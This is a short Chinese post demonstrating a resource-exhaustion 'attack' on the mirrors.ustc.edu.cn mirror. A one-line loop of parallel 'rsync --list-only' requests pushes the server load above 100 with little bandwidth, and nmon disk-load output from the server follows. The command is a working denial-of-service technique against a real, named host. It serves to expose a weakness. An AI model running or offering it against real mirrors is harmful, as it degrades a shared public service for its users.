如何仅用不到 1 MB/s 的带宽把 mirrors.ustc.edu.cn 的负载提高到 100 以上?下面一行命令就能做到(拆开成几行写以便看清楚):

rsync rsync://mirrors.ustc.edu.cn | awk '{print $1}' | while read m; do 
   [ -z "$m" ] && continue
   rsync -r --list-only rsync://mirrors.ustc.edu.cn/$m >$m &
done

这行命令的作用是获取 mirrors 上每个源的文件列表,所有源并行操作。进行真正的 rsync 同步之前,都要执行获取文件列表的操作,因此这个操作是完全合法的,只是我们发起的请求并发数有点高。

执行此命令后,在 mirrors 服务器上看到的负载如下图所示,而发起“攻击”的机器仅用了不到 3 MB/s 的带宽:

┌nmon─13g──────[H for help]───Hostname=mirrors──────Refresh= 2secs ───00:08.45─┐
│ Kernel Stats ────────────────────────────────────────────────────────────────│
│ RunQueue              1   Load Average    CPU use since boot time            │
│ ContextSwitch   11384.5    1 mins 109.04    Uptime Days=106 Hours= 1 Mins=132│
│ Forks               0.0    5 mins 73.83    Idle   Days=1377 Hours=13 Mins=22 │
│ Interrupts      26381.3   15 mins 37.30    Average CPU use=-1198.96%%        │
│ Disk I/O ──/proc/diskstats────mostly in KB/s─────Warning:contains duplicates─│
│DiskName Busy  Read WriteMB|0          |25         |50          |75       100|│
│sda        5%    0.3    0.2|RRW                                    >         |│
│sda1       0%    0.0    0.0|>                                                |│
│sda2       5%    0.3    0.2|RRW                                    >         |│
│sdb        9%   11.5    0.0|RRRRR    >                                       |│
│sdc        0%    0.0    0.0|>                                                |│
│sdc1       0%    0.0    0.0|>                                                |│
│sdd      100%    3.6    0.0|RRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRR>│
│sde      100%    8.0    0.2|RRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRR>│
│sdf       94%    6.0    0.0|RRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRR  >│
│sdg      100%    6.9    0.0|RRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRR>│
│dm-0       1%    0.0    0.1|R                                      >         |│
│dm-1     100%    7.0    0.0|RRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRR>│
│dm-2      94%    5.9    0.0|RRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRR  >│
│dm-3     100%    7.9    0.0|RRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRR>│
│dm-4     100%    3.4    0.0|RRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRR>│
│dm-5       3%    0.3    0.0|RR  >                                            |│
│dm-6       0%    0.0    0.1|        >                                        |│
│sdh      100%    5.2    0.0|RRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRR>│
│sdh1     100%    5.2    0.0|RRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRR>│
│Totals Read-MB/s=71.7     Writes-MB/s=0.7      Transfers/sec=4584.9           │
│──────────────────────────────────────────────────────────────────────────────│

Mirrors 流量图(下图)中,00:07 左右的低谷就是上述“攻击”所致。

collection.modified (1)

大约 15 分钟后,“攻击”源所用平均带宽下降到 250 KB/s,而 mirrors 服务器的 load average (1 min) 仍然高达 75,这是由于一些“文件数较少”和“被缓存”的文件列表已经发送完毕,剩下的都是“难啃的骨头”需要大量磁盘随机访问了。如果精心选择要同步的源甚至子目录,应该可以用相对少的带宽把 mirrors 的负载升高到很高,进而影响正常用户的服务质量。